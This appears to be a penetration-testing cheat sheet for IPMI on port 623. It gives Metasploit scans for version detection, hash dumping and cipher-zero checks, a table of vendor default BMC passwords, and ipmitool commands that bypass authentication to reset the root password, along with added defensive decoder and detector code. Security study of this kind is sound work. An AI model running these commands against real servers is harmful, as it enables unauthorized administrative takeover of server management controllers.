# 623 - IPMI

### Metasploit

### Find version

```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2)Level(1.5,2.0)
```
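The scanner above works by sending a "Get Channel Authentication Capabilities" request and decoding the reply; the UserAuth/PassAuth/Level fields in its output are that reply's bit flags. The following decoder is an added example (not Metasploit's code) for auditing the same reply from a defender's side: it decodes the response data field of the command (NetFn App, command 0x38, with RMCP/session/IPMI headers already stripped) per the IPMI 2.0 specification and lists the settings worth fixing. The function names, the `audit_findings` wording and both sample byte strings are constructed for this example.

```python
"""Decode an IPMI "Get Channel Authentication Capabilities" response.

Added example, not Metasploit's code. Input is the response *data* field of
the command (NetFn App, command 0x38) with the RMCP, session and IPMI message
headers already stripped; field layout follows the IPMI 2.0 specification.
"""

# Response byte 3: authentication type support (bit flags)
AUTH_TYPE_BITS = {
    0x01: "none",
    0x02: "md2",
    0x04: "md5",
    0x10: "straight_password",
    0x20: "oem",
}
IPMI20_EXTENDED = 0x80  # responder supports IPMI v2.0 extended capabilities

# Response byte 4: authentication status (bit flags)
ANONYMOUS_LOGIN = 0x01
NULL_USERNAMES = 0x02
NON_NULL_USERNAMES = 0x04
USER_LEVEL_AUTH_DISABLED = 0x08
PER_MESSAGE_AUTH_DISABLED = 0x10
KG_NON_ZERO = 0x20

# Response byte 5 (only meaningful when IPMI20_EXTENDED is set)
SUPPORTS_IPMI15 = 0x01
SUPPORTS_IPMI20 = 0x02


def decode_channel_auth_caps(data: bytes) -> dict:
    """Return the decoded capability fields as a dict; raise on short or failed replies."""
    if len(data) < 5:
        raise ValueError("response data too short")
    completion, channel, auth_support, auth_status, extended = data[:5]
    if completion != 0x00:
        raise ValueError(f"command failed, completion code 0x{completion:02x}")
    info = {
        "channel": channel,
        "password_auth": sorted(name for bit, name in AUTH_TYPE_BITS.items()
                                if auth_support & bit),
        "anonymous_login": bool(auth_status & ANONYMOUS_LOGIN),
        "null_usernames": bool(auth_status & NULL_USERNAMES),
        "non_null_usernames": bool(auth_status & NON_NULL_USERNAMES),
        "user_level_auth": not auth_status & USER_LEVEL_AUTH_DISABLED,
        "per_message_auth": not auth_status & PER_MESSAGE_AUTH_DISABLED,
        "kg_non_zero": bool(auth_status & KG_NON_ZERO),
        "levels": [],
    }
    if auth_support & IPMI20_EXTENDED:
        if extended & SUPPORTS_IPMI15:
            info["levels"].append("1.5")
        if extended & SUPPORTS_IPMI20:
            info["levels"].append("2.0")
    else:
        info["levels"].append("1.5")  # pre-2.0 responder: byte 5 is reserved
    return info


def audit_findings(info: dict) -> list:
    """Settings a reviewer would want changed on a management network."""
    findings = []
    if info["anonymous_login"]:
        findings.append("anonymous login enabled")
    if info["null_usernames"]:
        findings.append("null usernames accepted")
    if "none" in info["password_auth"]:
        findings.append("authentication type 'none' offered")
    if "straight_password" in info["password_auth"]:
        findings.append("plaintext (straight) password authentication offered")
    if "1.5" in info["levels"]:
        findings.append("IPMI 1.5 sessions allowed (legacy MD2/MD5 session auth)")
    if "2.0" in info["levels"] and not info["kg_non_zero"]:
        findings.append("BMC key (Kg) left at the default all-zero value")
    return findings


# Constructed sample data, not captured from a real BMC:
# channel 1, IPMI 2.0 capable, MD2+MD5, non-null users, both 1.5 and 2.0 sessions.
SAMPLE_TYPICAL = bytes([0x00, 0x01, 0x86, 0x04, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00])
# channel 1, IPMI 1.5 only, auth types none/MD5/straight, anonymous and null users.
SAMPLE_WEAK = bytes([0x00, 0x01, 0x15, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])

if __name__ == "__main__":
    for label, sample in (("typical", SAMPLE_TYPICAL), ("weak", SAMPLE_WEAK)):
        info = decode_channel_auth_caps(sample)
        print(label, info["password_auth"], info["levels"])
        for finding in audit_findings(info):
            print("  -", finding)
```

Running it on the constructed samples prints the offered password-auth types and session levels for each, then the findings; the "typical" sample still gets flagged for allowing IPMI 1.5 sessions, which is the usual state of a BMC that has not been restricted to IPMI 2.0 with a strong cipher suite.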

### Dump hashes

```
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts [TARGETS]
run
```

### Common default credentials

| Product Name                                    | Default Username | Default Password                         |
| ----------------------------------------------- | ---------------- | ---------------------------------------- |
| HP Integrated Lights Out (iLO)                  | Administrator    | \<factory randomized 8-character string> |
| Dell Remote Access Card (iDRAC, DRAC)           | root             | calvin                                   |
| IBM Integrated Management Module (IMM)          | USERID           | PASSW0RD (with a zero)                   |
| Fujitsu Integrated Remote Management Controller | admin            | admin                                    |
| Supermicro IPMI (2.0)                           | ADMIN            | ADMIN                                    |
| Oracle/Sun Integrated Lights Out Manager (ILOM) | root             | changeme                                 |
| ASUS iKVM BMC                                   | admin            | admin                                    |

Resources: <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>

## Zero cipher authentication bypass

Cipher suite 0 ("cipher zero") in IPMI 2.0 uses no authentication, integrity or confidentiality algorithm, so a BMC that accepts it lets a client open a session without a valid password. The result is administrative access.

### Check if vulnerable

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.22
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.22->10.0.0.22 (1 hosts)
[+] 10.0.0.22:623 - IPMI - VULNERABLE: Accepted a session open request
```
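On the monitoring side, the same check can be turned around: a cipher-zero attempt is visible on the wire as an RMCP+ Open Session Request whose three algorithm records are all zero. The detector below is an added example, not code from the page or from Metasploit/ipmitool. It parses the raw UDP payload of a datagram to port 623 following the IPMI 2.0 framing (RMCP header, RMCP+ session header, 32-byte Open Session Request payload) and reports the requested algorithms. The function names and the `build_sample_request` fixture (which only builds test input for the parser) are constructed for this example.

```python
"""Flag RMCP+ Open Session Requests that ask for cipher suite 0.

Added detection example, not code from the page or from ipmitool/Metasploit.
It takes the raw UDP payload of a datagram sent to port 623 and reports the
authentication, integrity and confidentiality algorithms the client asked for.
Framing follows the IPMI 2.0 specification: RMCP header, RMCP+ session
header, then the 32-byte Open Session Request payload.
"""
import struct

RMCP_VERSION = 0x06
RMCP_CLASS_IPMI = 0x07           # low 5 bits of the RMCP class byte
AUTH_TYPE_RMCP_PLUS = 0x06       # session header auth type for IPMI 2.0 / RMCP+
PAYLOAD_OPEN_SESSION_REQ = 0x10  # low 6 bits of the payload type byte

AUTH_ALGS = {0: "RAKP-none", 1: "RAKP-HMAC-SHA1", 2: "RAKP-HMAC-MD5", 3: "RAKP-HMAC-SHA256"}
INTEG_ALGS = {0: "none", 1: "HMAC-SHA1-96", 2: "HMAC-MD5-128", 3: "MD5-128", 4: "HMAC-SHA256-128"}
CONF_ALGS = {0: "none", 1: "AES-CBC-128", 2: "xRC4-128", 3: "xRC4-40"}


def parse_open_session_request(udp_payload: bytes):
    """Return (auth, integrity, confidentiality) algorithm ids requested by an
    RMCP+ Open Session Request, or None if the datagram is something else."""
    if len(udp_payload) < 16:
        return None
    version, _reserved, _seq, msg_class = udp_payload[:4]
    if version != RMCP_VERSION or (msg_class & 0x1F) != RMCP_CLASS_IPMI:
        return None
    session = udp_payload[4:]
    if session[0] != AUTH_TYPE_RMCP_PLUS or (session[1] & 0x3F) != PAYLOAD_OPEN_SESSION_REQ:
        return None
    # session id (4) + session sequence (4) + payload length (2, little-endian)
    (length,) = struct.unpack_from("<H", session, 10)
    payload = session[12:12 + length]
    if length < 32 or len(payload) < 32:
        return None
    # tag(1) priv(1) reserved(2) console session id(4), then three 8-byte
    # algorithm records: type(1) reserved(2) length(1) algorithm(1) reserved(3)
    algs = {}
    for offset in (8, 16, 24):
        rec_type, _r1, _r2, _rec_len, alg = payload[offset:offset + 5]
        algs[rec_type] = alg & 0x3F
    if set(algs) != {0, 1, 2}:
        return None
    return (algs[0], algs[1], algs[2])


def is_cipher_zero(udp_payload: bytes) -> bool:
    """True when the client requests no authentication, integrity or confidentiality."""
    return parse_open_session_request(udp_payload) == (0, 0, 0)


def describe(algs) -> str:
    auth, integ, conf = algs
    text = (f"auth={AUTH_ALGS.get(auth, auth)} "
            f"integ={INTEG_ALGS.get(integ, integ)} conf={CONF_ALGS.get(conf, conf)}")
    return text + " (cipher suite 0)" if algs == (0, 0, 0) else text


def scan_datagrams(datagrams) -> list:
    """datagrams: iterable of (source, udp_payload). Returns one alert string
    for every cipher-suite-0 session request seen."""
    alerts = []
    for source, payload in datagrams:
        algs = parse_open_session_request(payload)
        if algs == (0, 0, 0):
            alerts.append(f"{source}: cipher-zero Open Session Request, {describe(algs)}")
    return alerts


def build_sample_request(auth: int, integ: int, conf: int) -> bytes:
    """Constructed test fixture (not a capture): a minimal RMCP+ Open Session Request."""
    rmcp = bytes([RMCP_VERSION, 0x00, 0xFF, RMCP_CLASS_IPMI])
    records = b"".join(bytes([t, 0, 0, 8, alg, 0, 0, 0])
                       for t, alg in ((0, auth), (1, integ), (2, conf)))
    payload = bytes([0x00, 0x04, 0x00, 0x00]) + b"\xa4\xa3\xa2\xa0" + records
    header = (bytes([AUTH_TYPE_RMCP_PLUS, PAYLOAD_OPEN_SESSION_REQ])
              + b"\x00" * 8 + struct.pack("<H", len(payload)))
    return rmcp + header + payload


if __name__ == "__main__":
    sample = [
        ("10.0.0.50", build_sample_request(0, 0, 0)),  # cipher suite 0
        ("10.0.0.51", build_sample_request(1, 1, 1)),  # cipher suite 3
    ]
    for line in scan_datagrams(sample):
        print(line)
```

A request alone only shows that someone asked for cipher suite 0; the BMC is vulnerable when its Open Session Response (payload type 0x11) comes back with status code 0, which is exactly what the Metasploit module above reports as "Accepted a session open request". In a real deployment the datagrams would come from a packet capture or an IDS hook on UDP/623 rather than from the constructed fixture.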

### Connect

The Linux ipmitool client is used to interact with the service and bypass authentication (the -C 0 option selects cipher suite 0).

We will set the root user account password to abc123 via IPMI.

```
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 root true true true ADMINISTRATOR
3 Oper1 true true true ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
root@kali:~# ssh root@10.0.0.22
root@10.121.1.22's password: abc123
/admin1-> version
SM CLP Version: 1.0.2
SM ME Addressing Version: 1.0.0b
```
